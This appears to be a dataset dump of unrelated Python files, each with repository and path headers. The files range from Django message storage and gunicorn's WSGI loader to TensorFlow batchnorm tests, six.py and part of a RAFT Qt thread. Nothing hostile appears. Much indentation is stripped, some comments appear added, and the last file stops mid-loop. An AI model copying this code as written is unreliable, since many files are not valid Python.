evlist = perf.evlist(cpus, threads)
evlist.add(evsel)
evlist.mmap()
while True:
evlist.poll(timeout = -1)
for cpu in cpus:
event = evlist.read_on_cpu(cpu)
if not event:
continue
print "cpu: %2d, pid: %4d, tid: %4d" % (event.sample_cpu,
event.sample_pid,
event.sample_tid),
print event
if __name__ == '__main__':
main()
|
ivan-fedorov/intellij-community
|
refs/heads/master
|
python/lib/Lib/site-packages/django/contrib/messages/storage/user_messages.py
|
308
|
"""
Storages used to assist in the deprecation of contrib.auth User messages.
"""
from django.contrib.messages import constants
from django.contrib.messages.storage.base import BaseStorage, Message
from django.contrib.auth.models import User
from django.contrib.messages.storage.fallback import FallbackStorage
class UserMessagesStorage(BaseStorage):
"""
Retrieves messages from the User, using the legacy user.message_set API.
This storage is "read-only" insofar as it can only retrieve and delete
messages, not store them.
"""
session_key = '_messages'
def _get_messages_queryset(self):
"""
Returns the QuerySet containing all user messages (or ``None`` if
request.user is not a contrib.auth User).
"""
user = getattr(self.request, 'user', None)
if isinstance(user, User):
return user._message_set.all()
def add(self, *args, **kwargs):
raise NotImplementedError('This message storage is read-only.')
def _get(self, *args, **kwargs):
"""
Retrieves a list of messages assigned to the User. This backend never
stores anything, so all_retrieved is assumed to be False.
"""
queryset = self._get_messages_queryset()
if queryset is None:
# This is a read-only and optional storage, so to ensure other
# storages will also be read if used with FallbackStorage an empty
# list is returned rather than None.
return [], False
messages = []
for user_message in queryset:
messages.append(Message(constants.INFO, user_message.message))
return messages, False
def _store(self, messages, *args, **kwargs):
"""
Removes any messages assigned to the User and returns the list of
messages (since no messages are stored in this read-only storage).
"""
queryset = self._get_messages_queryset()
if queryset is not None:
queryset.delete()
return messages
class LegacyFallbackStorage(FallbackStorage):
"""
Works like ``FallbackStorage`` but also handles retrieving (and clearing)
contrib.auth User messages.
"""
storage_classes = (UserMessagesStorage,) + FallbackStorage.storage_classes
|
pombredanne/pyjs
|
refs/heads/master
|
examples/kitchensink/sink/Logger.py
|
6
|
from pyjamas.ui.Grid import Grid
class Logger(Grid):
instances = []
def __init__(self):
Logger.instances.append(self)
Grid.__init__(self)
self.targets=[]
self.targets.append("app")
#self.targets.append("ui")
self.resize(len(self.targets)+1, 2)
self.setBorderWidth("1")
self.counter=0
self.setHTML(0, 0, "<b>Log</b>")
self.setText(1, 0, "app")
for i in range(len(self.targets)):
target=self.targets[i]
self.setText(i+1, 0, target)
@classmethod
def getSingleton(self):
return Logger.singleton
def setSingleton(self):
Logger.singleton = self
def addTarget(self, target):
self.targets.append(target)
self.resize(len(self.targets)+1, 2)
self.setText(len(self.targets), 0, target)
return self.targets.index(target)
@classmethod
def write(cls, target, message):
for logger in cls.instances:
logger.onMessage(target, message)
def onMessage(self, target, message):
self.counter+=1
if target=='':
target='app'
target_idx=self.targets.index(target)
# add new target
if target_idx<0:
target_idx=self.addTarget(target)
target_row=target_idx+1
old_text=self.getHTML(target_row, 1)
log_line=str(self.counter) + ": " + message
if old_text==' ':
new_text=log_line
else:
new_text=old_text + "<br>" + log_line
self.setHTML(target_row, 1, new_text)
|
florian-dacosta/OpenUpgrade
|
refs/heads/master
|
addons/mail/mail_vote.py
|
439
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2012-Today OpenERP SA (<http://www.openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
from openerp.osv import fields, osv
class mail_vote(osv.Model):
''' Mail vote feature allow users to like and unlike messages attached
to a document. This allows for example to build a ranking-based
displaying of messages, for FAQ. '''
_name = 'mail.vote'
_description = 'Mail Vote'
_columns = {
'message_id': fields.many2one('mail.message', 'Message', select=1,
ondelete='cascade', required=True),
'user_id': fields.many2one('res.users', 'User', select=1,
ondelete='cascade', required=True),
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
scottdanesi/earthshaker-aftershock
|
refs/heads/master
|
procgame/dmd/dmd.py
|
2
|
import pinproc
import time
import os
class Frame(pinproc.DMDBuffer):
"""DMD frame/bitmap.
Subclass of :class:`pinproc.DMDBuffer`.
"""
width = 0
"""Width of the frame in dots."""
height = 0
"""Height of the frame in dots."""
def __init__(self, width, height):
"""Initializes the frame to the given `width` and `height`."""
super(Frame, self).__init__(width, height)
self.width = width
self.height = height
def copy_rect(dst, dst_x, dst_y, src, src_x, src_y, width, height, op="copy"):
"""Static method which performs some type checking before calling :meth:`pinproc.DMDBuffer.copy_to_rect`."""
if not (issubclass(type(dst), pinproc.DMDBuffer) and issubclass(type(src), pinproc.DMDBuffer)):
raise ValueError("Incorrect types")
src.copy_to_rect(dst, int(dst_x), int(dst_y), int(src_x), int(src_y), int(width), int(height), op)
copy_rect = staticmethod(copy_rect)
def subframe(self, x, y, width, height):
"""Generates a new frame based on a sub rectangle of this frame."""
subframe = Frame(width, height)
Frame.copy_rect(subframe, 0, 0, self, x, y, width, height, 'copy')
return subframe
def copy(self):
"""Returns a copy of itself."""
frame = Frame(self.width, self.height)
frame.set_data(self.get_data())
return frame
def ascii(self):
"""Returns an ASCII representation of itself."""
output = ''
table = [' ', '.', '.', '.', ',', ',', ',', '-', '-', '=', '=', '=', '*', '*', '#', '#',]
for y in range(self.height):
for x in range(self.width):
dot = self.get_dot(x, y)
output += table[dot & 0xf]
output += "\n"
return output
def create_with_text(lines, palette = {' ':0, '*':15}):
"""Create a frame based on text.
This class method can be used to generate small sprites within the game's source code::
frame = Frame.create_with_text(lines=[ \\
'*+++*', \\
' *+* ', \\
' * '], palette={' ':0, '+':7, '*':15})
"""
height = len(lines)
if height > 0:
width = len(lines[0])
else:
width = 0
frame = Frame(width, height)
for y in range(height):
for x in range(width):
char = lines[y][x]
frame.set_dot(x, y, palette[char])
return frame
create_with_text = staticmethod(create_with_text)
def create_frames_from_grid( self, num_cols, num_rows ):
frames = []
width = self.width / num_cols
height = self.height / num_rows
# Use nested loops to step through each column of each row, creating a new frame at each iteration and copying in the appropriate data.
for row_index in range(0,num_rows):
for col_index in range(0,num_cols):
new_frame = Frame(width, height)
Frame.copy_rect(dst=new_frame, dst_x=0, dst_y=0, src=self, src_x=width*col_index, src_y=height*row_index, width=width, height=height, op='copy')
frames += [new_frame]
return frames
class Layer(object):
"""
The ``Layer`` class is the basis for the pyprocgame display architecture.
Subclasses override :meth:`next_frame` to provide a frame for the current moment in time.
Handles compositing of provided frames and applying transitions within a :class:`DisplayController` context.
"""
opaque = False
"""Determines whether layers below this one will be rendered.
If `True`, the :class:`DisplayController` will not render any layers after this one
(such as from modes with lower priorities -- see :class:`DisplayController` for more information).
"""
target_x = 0
"""Base `x` component of the coordinates at which this layer will be composited upon a target buffer."""
target_y = 0
"""Base `y` component of the coordinates at which this layer will be composited upon a target buffer."""
target_x_offset = 0
"""Translation component used in addition to :attr:`target_x` as this layer's final compositing position."""
target_y_offset = 0
"""Translation component used in addition to :attr:`target_y` as this layer's final compositing position."""
enabled = True
"""If `False`, :class:`DisplayController` will ignore this layer."""
composite_op = 'copy'
"""Composite operation used by :meth:`composite_next` when calling :meth:`~pinproc.DMDBuffer.copy_rect`."""
transition = None
"""Transition which :meth:`composite_next` applies to the result of :meth:`next_frame` prior to compositing upon the output."""
def __init__(self, opaque=False):
"""Initialize a new Layer object."""
super(Layer, self).__init__()
self.opaque = opaque
self.set_target_position(0, 0)
def reset(self):
# To be overridden
pass
def set_target_position(self, x, y):
"""Setter for :attr:`target_x` and :attr:`target_y`."""
self.target_x = x
self.target_y = y
def next_frame(self):
"""Returns an instance of a Frame object to be shown, or None if there is no frame.
The default implementation returns ``None``; subclasses should implement this method."""
return None
def composite_next(self, target):
"""Composites the next frame of this layer onto the given target buffer.
Called by :meth:`DisplayController.update`.
Generally subclasses should not override this method; implementing :meth:`next_frame` is recommended instead.
"""
src = self.next_frame()
if src is not None:
if self.transition is not None:
src = self.transition.next_frame(from_frame=target, to_frame=src)
Frame.copy_rect(dst=target, dst_x=self.target_x+self.target_x_offset, dst_y=self.target_y+self.target_y_offset, src=src, src_x=0, src_y=0, width=src.width, height=src.height, op=self.composite_op)
return src
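# Hedged sketch, not part of the original module: a minimal Layer subclass
# that always returns one fixed frame built from ASCII art. The class name
# and dot pattern are illustrative; it relies only on Frame and Layer above.
class ExampleStaticLayer(Layer):
    """Shows a single static frame; DisplayController composites it each update."""
    def __init__(self):
        super(ExampleStaticLayer, self).__init__(opaque=True)
        self.frame = Frame.create_with_text(lines=[
            '*****',
            '*   *',
            '*****'], palette={' ': 0, '*': 15})
    def next_frame(self):
        # Returning the same Frame on every call keeps the display static.
        return self.frame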
|
gangadhar-kadam/adb-erp
|
refs/heads/master
|
setup/doctype/price_list/price_list.py
|
5
|
# ERPNext - web based ERP (http://erpnext.com)
# Copyright (C) 2012 Web Notes Technologies Pvt Ltd
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import unicode_literals
import webnotes
from webnotes import msgprint, _
from webnotes.utils import cint
class DocType:
def __init__(self, d, dl):
self.doc, self.doclist = d, dl
def onload(self):
self.doclist.extend(webnotes.conn.sql("""select * from `tabItem Price`
where price_list_name=%s""", self.doc.name, as_dict=True, update={"doctype": "Item Price"}))
def validate(self):
if not (cint(self.doc.valid_for_all_countries) or len(self.doclist.get({"parentfield": "valid_for_countries"}))):
msgprint(_("""Please check "Valid For All Countries" or \
enter at least one row in the "Countries" table."""), raise_exception=True)
def on_trash(self):
webnotes.conn.sql("""delete from `tabItem Price` where price_list_name = %s""",
self.doc.name)
|
keithf4/spotify_pm
|
refs/heads/master
|
find_dupes_user_playlists.py
|
1
|
#!/usr/bin/env python
from SpotifyPM import SpotifyPM
spm = SpotifyPM()
# Turn this into argparse argument
username = spm.get_username()
# Turn scope into argparse argument
sp = spm.auth(username, 'playlist-read-private')
if sp != None:
playlists = sp.user_playlists(username)
for playlist in playlists['items']:
if playlist['owner']['id'] == username:
print(playlist['name'])
dupe_list = spm.find_dupe_in_playlist(sp, playlist, username)
if len(dupe_list) > 0:
for name in dupe_list:
print("\t" + name)
else:
print("\t<<No dupes>>")
else:
print("Can't get token for " + username)
|
py-geek/City-Air
|
refs/heads/master
|
venv/lib/python2.7/site-packages/gunicorn/app/wsgiapp.py
|
96
|
# -*- coding: utf-8 -
#
# This file is part of gunicorn released under the MIT license.
# See the NOTICE for more information.
import os
import sys
from gunicorn.errors import ConfigError
from gunicorn.app.base import Application
from gunicorn import util
class WSGIApplication(Application):
def init(self, parser, opts, args):
if opts.paste:
app_name = 'main'
path = opts.paste
if '#' in path:
path, app_name = path.split('#')
path = os.path.abspath(os.path.normpath(
os.path.join(util.getcwd(), path)))
if not os.path.exists(path):
raise ConfigError("%r not found" % path)
# paste application, load the config
self.cfgurl = 'config:%s#%s' % (path, app_name)
self.relpath = os.path.dirname(path)
from .pasterapp import paste_config
return paste_config(self.cfg, self.cfgurl, self.relpath)
if len(args) < 1:
parser.error("No application module specified.")
self.cfg.set("default_proc_name", args[0])
self.app_uri = args[0]
def chdir(self):
# chdir to the configured path before loading,
# default is the current dir
os.chdir(self.cfg.chdir)
# add the path to sys.path
sys.path.insert(0, self.cfg.chdir)
def load_wsgiapp(self):
self.chdir()
# load the app
return util.import_app(self.app_uri)
def load_pasteapp(self):
self.chdir()
# load the paste app
from .pasterapp import load_pasteapp
return load_pasteapp(self.cfgurl, self.relpath, global_conf=None)
def load(self):
if self.cfg.paste is not None:
return self.load_pasteapp()
else:
return self.load_wsgiapp()
def run():
"""\
The ``gunicorn`` command line runner for launching Gunicorn with
generic WSGI applications.
"""
from gunicorn.app.wsgiapp import WSGIApplication
WSGIApplication("%(prog)s [OPTIONS] [APP_MODULE]").run()
if __name__ == '__main__':
run()
|
souzainf3/namebench
|
refs/heads/master
|
tools/ordered-uniq.py
|
175
|
#!/usr/bin/env python
# Copyright 2009 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Like uniq, but does not require sort-order to change."""
import sys
seen = {}
for full_line in sys.stdin:
line = full_line.rstrip()
if line not in seen:
sys.stdout.write(full_line)
seen[line] = 1
sys.stdout.close()
sys.stdin.close()
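# Hedged illustration, not part of the original script (kept as comments so
# the filter's runtime behavior is unchanged): the same order-preserving
# dedup expressed over an in-memory list, with illustrative values.
#
#   lines = ['b', 'a', 'b', 'c', 'a']
#   seen = set()
#   deduped = [x for x in lines if not (x in seen or seen.add(x))]
#   # deduped == ['b', 'a', 'c']  -- first occurrences keep their order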
|
laszlocsomor/tensorflow
|
refs/heads/master
|
tensorflow/python/keras/_impl/keras/layers/normalization_test.py
|
30
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for normalization layers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.keras._impl import keras
from tensorflow.python.keras._impl.keras import testing_utils
from tensorflow.python.platform import test
class NormalizationLayersTest(test.TestCase):
def test_basic_batchnorm(self):
with self.test_session():
testing_utils.layer_test(
keras.layers.BatchNormalization,
kwargs={
'momentum': 0.9,
'epsilon': 0.1,
'gamma_regularizer': keras.regularizers.l2(0.01),
'beta_regularizer': keras.regularizers.l2(0.01)
},
input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.BatchNormalization,
kwargs={
'gamma_initializer': 'ones',
'beta_initializer': 'ones',
'moving_mean_initializer': 'zeros',
'moving_variance_initializer': 'ones'
},
input_shape=(3, 4, 2))
testing_utils.layer_test(
keras.layers.BatchNormalization,
kwargs={'scale': False,
'center': False},
input_shape=(3, 3))
def test_batchnorm_weights(self):
with self.test_session():
layer = keras.layers.BatchNormalization(scale=False, center=False)
layer.build((None, 3, 4))
self.assertEqual(len(layer.trainable_weights), 0)
self.assertEqual(len(layer.weights), 2)
layer = keras.layers.BatchNormalization()
layer.build((None, 3, 4))
self.assertEqual(len(layer.trainable_weights), 2)
self.assertEqual(len(layer.weights), 4)
def test_batchnorm_regularization(self):
with self.test_session():
layer = keras.layers.BatchNormalization(
gamma_regularizer='l1', beta_regularizer='l1')
layer.build((None, 3, 4))
self.assertEqual(len(layer.losses), 2)
max_norm = keras.constraints.max_norm
layer = keras.layers.BatchNormalization(
gamma_constraint=max_norm, beta_constraint=max_norm)
layer.build((None, 3, 4))
self.assertEqual(layer.gamma.constraint, max_norm)
self.assertEqual(layer.beta.constraint, max_norm)
def test_batchnorm_correctness(self):
with self.test_session():
model = keras.models.Sequential()
norm = keras.layers.BatchNormalization(input_shape=(10,), momentum=0.8)
model.add(norm)
model.compile(loss='mse', optimizer='sgd')
# centered on 5.0, variance 10.0
x = np.random.normal(loc=5.0, scale=10.0, size=(1000, 10))
model.fit(x, x, epochs=4, verbose=0)
out = model.predict(x)
out -= keras.backend.eval(norm.beta)
out /= keras.backend.eval(norm.gamma)
np.testing.assert_allclose(out.mean(), 0.0, atol=1e-1)
np.testing.assert_allclose(out.std(), 1.0, atol=1e-1)
def test_batchnorm_convnet(self):
if test.is_gpu_available(cuda_only=True):
with self.test_session(use_gpu=True):
model = keras.models.Sequential()
norm = keras.layers.BatchNormalization(
axis=1, input_shape=(3, 4, 4), momentum=0.8)
model.add(norm)
model.compile(loss='mse', optimizer='sgd')
# centered on 5.0, variance 10.0
x = np.random.normal(loc=5.0, scale=10.0, size=(1000, 3, 4, 4))
model.fit(x, x, epochs=4, verbose=0)
out = model.predict(x)
out -= np.reshape(keras.backend.eval(norm.beta), (1, 3, 1, 1))
out /= np.reshape(keras.backend.eval(norm.gamma), (1, 3, 1, 1))
np.testing.assert_allclose(np.mean(out, axis=(0, 2, 3)), 0.0, atol=1e-1)
np.testing.assert_allclose(np.std(out, axis=(0, 2, 3)), 1.0, atol=1e-1)
def test_shared_batchnorm(self):
"""Test that a BN layer can be shared across different data streams.
"""
with self.test_session():
# Test single layer reuse
bn = keras.layers.BatchNormalization()
x1 = keras.layers.Input(shape=(10,))
_ = bn(x1)
x2 = keras.layers.Input(shape=(10,))
y2 = bn(x2)
x = np.random.normal(loc=5.0, scale=10.0, size=(2, 10))
model = keras.models.Model(x2, y2)
model.compile('sgd', 'mse')
model.train_on_batch(x, x)
assert len(model.updates) == 2
# Test model-level reuse
x3 = keras.layers.Input(shape=(10,))
y3 = model(x3)
new_model = keras.models.Model(x3, y3)
assert len(model.updates) == 2
new_model.compile('sgd', 'mse')
new_model.train_on_batch(x, x)
if __name__ == '__main__':
test.main()
|
SMALLplayer/smallplayer-image-creator
|
refs/heads/master
|
storage/.xbmc/addons/script.module.requests/lib/requests/packages/urllib3/packages/six.py
|
2374
|
"""Utilities for writing code that runs on Python 2 and 3"""
#Copyright (c) 2010-2011 Benjamin Peterson
#Permission is hereby granted, free of charge, to any person obtaining a copy of
#this software and associated documentation files (the "Software"), to deal in
#the Software without restriction, including without limitation the rights to
#use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of
#the Software, and to permit persons to whom the Software is furnished to do so,
#subject to the following conditions:
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS
#FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR
#COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER
#IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
#CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import operator
import sys
import types
__author__ = "Benjamin Peterson <benjamin@python.org>"
__version__ = "1.2.0" # Revision 41c74fef2ded
# True if we are running on Python 3.
PY3 = sys.version_info[0] == 3
if PY3:
string_types = str,
integer_types = int,
class_types = type,
text_type = str
binary_type = bytes
MAXSIZE = sys.maxsize
else:
string_types = basestring,
integer_types = (int, long)
class_types = (type, types.ClassType)
text_type = unicode
binary_type = str
if sys.platform.startswith("java"):
# Jython always uses 32 bits.
MAXSIZE = int((1 << 31) - 1)
else:
# It's possible to have sizeof(long) != sizeof(Py_ssize_t).
class X(object):
def __len__(self):
return 1 << 31
try:
len(X())
except OverflowError:
# 32-bit
MAXSIZE = int((1 << 31) - 1)
else:
# 64-bit
MAXSIZE = int((1 << 63) - 1)
del X
def _add_doc(func, doc):
"""Add documentation to a function."""
func.__doc__ = doc
def _import_module(name):
"""Import module, returning the module after the last dot."""
__import__(name)
return sys.modules[name]
class _LazyDescr(object):
def __init__(self, name):
self.name = name
def __get__(self, obj, tp):
result = self._resolve()
setattr(obj, self.name, result)
# This is a bit ugly, but it avoids running this again.
delattr(tp, self.name)
return result
class MovedModule(_LazyDescr):
def __init__(self, name, old, new=None):
super(MovedModule, self).__init__(name)
if PY3:
if new is None:
new = name
self.mod = new
else:
self.mod = old
def _resolve(self):
return _import_module(self.mod)
class MovedAttribute(_LazyDescr):
def __init__(self, name, old_mod, new_mod, old_attr=None, new_attr=None):
super(MovedAttribute, self).__init__(name)
if PY3:
if new_mod is None:
new_mod = name
self.mod = new_mod
if new_attr is None:
if old_attr is None:
new_attr = name
else:
new_attr = old_attr
self.attr = new_attr
else:
self.mod = old_mod
if old_attr is None:
old_attr = name
self.attr = old_attr
def _resolve(self):
module = _import_module(self.mod)
return getattr(module, self.attr)
class _MovedItems(types.ModuleType):
"""Lazy loading of moved objects"""
_moved_attributes = [
MovedAttribute("cStringIO", "cStringIO", "io", "StringIO"),
MovedAttribute("filter", "itertools", "builtins", "ifilter", "filter"),
MovedAttribute("input", "__builtin__", "builtins", "raw_input", "input"),
MovedAttribute("map", "itertools", "builtins", "imap", "map"),
MovedAttribute("reload_module", "__builtin__", "imp", "reload"),
MovedAttribute("reduce", "__builtin__", "functools"),
MovedAttribute("StringIO", "StringIO", "io"),
MovedAttribute("xrange", "__builtin__", "builtins", "xrange", "range"),
MovedAttribute("zip", "itertools", "builtins", "izip", "zip"),
MovedModule("builtins", "__builtin__"),
MovedModule("configparser", "ConfigParser"),
MovedModule("copyreg", "copy_reg"),
MovedModule("http_cookiejar", "cookielib", "http.cookiejar"),
MovedModule("http_cookies", "Cookie", "http.cookies"),
MovedModule("html_entities", "htmlentitydefs", "html.entities"),
MovedModule("html_parser", "HTMLParser", "html.parser"),
MovedModule("http_client", "httplib", "http.client"),
MovedModule("BaseHTTPServer", "BaseHTTPServer", "http.server"),
MovedModule("CGIHTTPServer", "CGIHTTPServer", "http.server"),
MovedModule("SimpleHTTPServer", "SimpleHTTPServer", "http.server"),
MovedModule("cPickle", "cPickle", "pickle"),
MovedModule("queue", "Queue"),
MovedModule("reprlib", "repr"),
MovedModule("socketserver", "SocketServer"),
MovedModule("tkinter", "Tkinter"),
MovedModule("tkinter_dialog", "Dialog", "tkinter.dialog"),
MovedModule("tkinter_filedialog", "FileDialog", "tkinter.filedialog"),
MovedModule("tkinter_scrolledtext", "ScrolledText", "tkinter.scrolledtext"),
MovedModule("tkinter_simpledialog", "SimpleDialog", "tkinter.simpledialog"),
MovedModule("tkinter_tix", "Tix", "tkinter.tix"),
MovedModule("tkinter_constants", "Tkconstants", "tkinter.constants"),
MovedModule("tkinter_dnd", "Tkdnd", "tkinter.dnd"),
MovedModule("tkinter_colorchooser", "tkColorChooser",
"tkinter.colorchooser"),
MovedModule("tkinter_commondialog", "tkCommonDialog",
"tkinter.commondialog"),
MovedModule("tkinter_tkfiledialog", "tkFileDialog", "tkinter.filedialog"),
MovedModule("tkinter_font", "tkFont", "tkinter.font"),
MovedModule("tkinter_messagebox", "tkMessageBox", "tkinter.messagebox"),
MovedModule("tkinter_tksimpledialog", "tkSimpleDialog",
"tkinter.simpledialog"),
MovedModule("urllib_robotparser", "robotparser", "urllib.robotparser"),
MovedModule("winreg", "_winreg"),
]
for attr in _moved_attributes:
setattr(_MovedItems, attr.name, attr)
del attr
moves = sys.modules[__name__ + ".moves"] = _MovedItems("moves")
def add_move(move):
"""Add an item to six.moves."""
setattr(_MovedItems, move.name, move)
def remove_move(name):
"""Remove item from six.moves."""
try:
delattr(_MovedItems, name)
except AttributeError:
try:
del moves.__dict__[name]
except KeyError:
raise AttributeError("no such move, %r" % (name,))
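# A minimal usage sketch (illustrative; assumes this vendored copy is importable
# as ``six``): attributes of ``six.moves`` resolve lazily to the correct module
# for the running interpreter.
#
#     from six.moves import StringIO   # io.StringIO on Python 3, StringIO.StringIO on 2
#     buf = StringIO()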
if PY3:
_meth_func = "__func__"
_meth_self = "__self__"
_func_code = "__code__"
_func_defaults = "__defaults__"
_iterkeys = "keys"
_itervalues = "values"
_iteritems = "items"
else:
_meth_func = "im_func"
_meth_self = "im_self"
_func_code = "func_code"
_func_defaults = "func_defaults"
_iterkeys = "iterkeys"
_itervalues = "itervalues"
_iteritems = "iteritems"
try:
advance_iterator = next
except NameError:
def advance_iterator(it):
return it.next()
next = advance_iterator
if PY3:
def get_unbound_function(unbound):
return unbound
Iterator = object
def callable(obj):
return any("__call__" in klass.__dict__ for klass in type(obj).__mro__)
else:
def get_unbound_function(unbound):
return unbound.im_func
class Iterator(object):
def next(self):
return type(self).__next__(self)
callable = callable
_add_doc(get_unbound_function,
"""Get the function out of a possibly unbound function""")
get_method_function = operator.attrgetter(_meth_func)
get_method_self = operator.attrgetter(_meth_self)
get_function_code = operator.attrgetter(_func_code)
get_function_defaults = operator.attrgetter(_func_defaults)
def iterkeys(d):
"""Return an iterator over the keys of a dictionary."""
return iter(getattr(d, _iterkeys)())
def itervalues(d):
"""Return an iterator over the values of a dictionary."""
return iter(getattr(d, _itervalues)())
def iteritems(d):
"""Return an iterator over the (key, value) pairs of a dictionary."""
return iter(getattr(d, _iteritems)())
if PY3:
def b(s):
return s.encode("latin-1")
def u(s):
return s
if sys.version_info[1] <= 1:
def int2byte(i):
return bytes((i,))
else:
# This is about 2x faster than the implementation above on 3.2+
int2byte = operator.methodcaller("to_bytes", 1, "big")
import io
StringIO = io.StringIO
BytesIO = io.BytesIO
else:
def b(s):
return s
def u(s):
return unicode(s, "unicode_escape")
int2byte = chr
import StringIO
StringIO = BytesIO = StringIO.StringIO
_add_doc(b, """Byte literal""")
_add_doc(u, """Text literal""")
if PY3:
import builtins
exec_ = getattr(builtins, "exec")
def reraise(tp, value, tb=None):
if value.__traceback__ is not tb:
raise value.with_traceback(tb)
raise value
print_ = getattr(builtins, "print")
del builtins
else:
def exec_(code, globs=None, locs=None):
"""Execute code in a namespace."""
if globs is None:
frame = sys._getframe(1)
globs = frame.f_globals
if locs is None:
locs = frame.f_locals
del frame
elif locs is None:
locs = globs
exec("""exec code in globs, locs""")
exec_("""def reraise(tp, value, tb=None):
raise tp, value, tb
""")
def print_(*args, **kwargs):
"""The new-style print function."""
fp = kwargs.pop("file", sys.stdout)
if fp is None:
return
def write(data):
if not isinstance(data, basestring):
data = str(data)
fp.write(data)
want_unicode = False
sep = kwargs.pop("sep", None)
if sep is not None:
if isinstance(sep, unicode):
want_unicode = True
elif not isinstance(sep, str):
raise TypeError("sep must be None or a string")
end = kwargs.pop("end", None)
if end is not None:
if isinstance(end, unicode):
want_unicode = True
elif not isinstance(end, str):
raise TypeError("end must be None or a string")
if kwargs:
raise TypeError("invalid keyword arguments to print()")
if not want_unicode:
for arg in args:
if isinstance(arg, unicode):
want_unicode = True
break
if want_unicode:
newline = unicode("\n")
space = unicode(" ")
else:
newline = "\n"
space = " "
if sep is None:
sep = space
if end is None:
end = newline
for i, arg in enumerate(args):
if i:
write(sep)
write(arg)
write(end)
_add_doc(reraise, """Reraise an exception.""")
def with_metaclass(meta, base=object):
"""Create a base class with a metaclass."""
return meta("NewBase", (base,), {})
|
chp1084/raft
|
refs/heads/master
|
core/workers/ResponsesThread.py
|
11
|
#
# Author: Gregory Fleischer (gfleischer@gmail.com)
#
# Copyright (c) 2011 RAFT Team
#
# This file is part of RAFT.
#
# RAFT is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# RAFT is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with RAFT. If not, see <http://www.gnu.org/licenses/>.
#
from PyQt4.QtCore import Qt, QObject, SIGNAL, QThread, QTimer, QMutex
from PyQt4.QtGui import *
import traceback
from core.database.constants import ResponsesTable
class ResponsesThread(QThread):
def __init__(self, framework, treeViewModel, parent = None):
QThread.__init__(self, parent)
self.framework = framework
self.treeViewModel = treeViewModel
self.qlock = QMutex()
self.cursor = None
self.lastId = -1
self.fillAll = False
self.doCallback = False
self.callbackObj = None
QObject.connect(self, SIGNAL('quit()'), self.quitHandler)
QObject.connect(self, SIGNAL('started()'), self.startedHandler)
self.Data = None
self.cursor = None
def db_attach(self):
self.Data = self.framework.getDB()
self.cursor = self.Data.allocate_thread_cursor()
self.fillResponses(True)
def db_detach(self):
self.close_cursor()
self.Data = None
def close_cursor(self):
if self.cursor and self.Data:
self.cursor.close()
self.Data.release_thread_cursor(self.cursor)
self.cursor = None
def run(self):
QObject.connect(self, SIGNAL('doFillResponses()'), self.fillResponsesHandler, Qt.DirectConnection)
self.exec_()
def quitHandler(self):
self.framework.debug_log('ResponsesThread quit...')
if self.cursor:
self.cursor.close()
self.exit(0)
def startedHandler(self):
self.framework.debug_log('ResponsesThread started...')
self.framework.subscribe_response_data_added(self.fillResponsesHandler)
self.framework.subscribe_database_events(self.db_attach, self.db_detach)
def fillResponses(self, fillAll, callback = None):
self.fillAll = fillAll
if callback:
self.doCallback = True
self.callbackObj = callback
else:
self.doCallback = False
QTimer.singleShot(50, self, SIGNAL('doFillResponses()'))
def fillResponsesHandler(self, fillAll = False):
if self.qlock.tryLock():
try:
if self.fillAll:
self.fillAll = False
self.treeViewModel.clearModel()
self.lastId = -1
rows = self.Data.read_newer_responses_info(self.cursor, self.lastId)
count = 0
datarows = []
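                # Feed rows to the tree view model in batches of 100, yielding the
                # thread between batches to keep the UI responsive.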
for row in rows:
count += 1
if 0 == (count % 100):
